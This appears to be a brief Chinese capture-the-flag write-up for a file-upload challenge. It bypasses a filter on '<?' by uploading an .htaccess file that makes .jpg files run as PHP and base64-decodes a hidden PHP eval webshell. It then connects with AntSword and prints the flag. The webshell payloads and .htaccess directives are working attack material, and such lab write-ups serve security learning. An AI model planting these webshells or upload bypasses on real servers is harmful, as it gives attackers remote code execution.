開啟靶機抓包發現過濾程式碼
發現.htaccess能上傳後傳入圖片馬
發現內容對<?進行過濾
我們換一種方式寫後門程式碼 <script language="php">eval($_POST['cmd']);</script>
寫入成功後發現沒有回顯
查資料發現可能使由於php版本過高不支援<script language="php">eval($_POST['cmd']);</script>
我們只能將注入語句編碼後,在.htaccess配置檔案中對檔案進行解碼
<?php@eval($_POST[1]);?> 編碼為:PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=
在.htaccess檔案中進行解碼 加入下面內容
AddType application/x-httpd-php .jpg
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"
連線蟻劍查詢flag
flag{cc9f0654-9bb1-4de8-9c4b-0d9f8af1d60d}